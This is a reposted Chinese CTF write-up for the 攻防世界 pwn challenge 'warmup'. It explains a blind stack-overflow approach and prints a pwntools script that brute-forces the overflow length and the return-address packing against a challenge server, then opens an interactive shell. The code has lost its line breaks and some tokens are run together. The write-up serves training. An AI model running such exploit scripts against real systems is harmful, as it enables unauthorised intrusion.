CTF(pwn)攻防世界warmup
生活随笔
收集整理的這篇文章主要介紹了
CTF(pwn)攻防世界warmup
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
題目描述
這種題很有意思,只給了題目場景地址沒有文件,讓你盲打,類似于web中的盲注吧;
nc連接,給了 目標地址, 思路是:利用棧溢出覆蓋,返回這個地址; 具體是溢出多少是不確定的,是P64(),還是 P32() 也是不確定的; 寫個EXP逐漸試一下
得到了flag, 若P64() 沒有得出答案的話,換成 P32再試一下;也可以設定適當的取值范圍來減少時間;
也可以參考另外一種EXP比我這個復雜一點,但操作只有一步:
from pwn import * b = 0x40060ddef fuzz(p, i, j):payload = 'a' * iif j==1:payload += p32(b)if j==2:payload += p64(b)p.recvuntil(">")p.sendline(payload)def main():for i in range(100):print(i)for j in range(1, 3):try:p = remote('111.200.241.244',45566)fuzz(p, i, j)print p.recv() p.interactive()except:p.close() main()總結
以上是生活随笔為你收集整理的CTF(pwn)攻防世界warmup的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 攻防世界(Pwn)dice_game,
- 下一篇: Xshell连接不上虚拟机的解决办法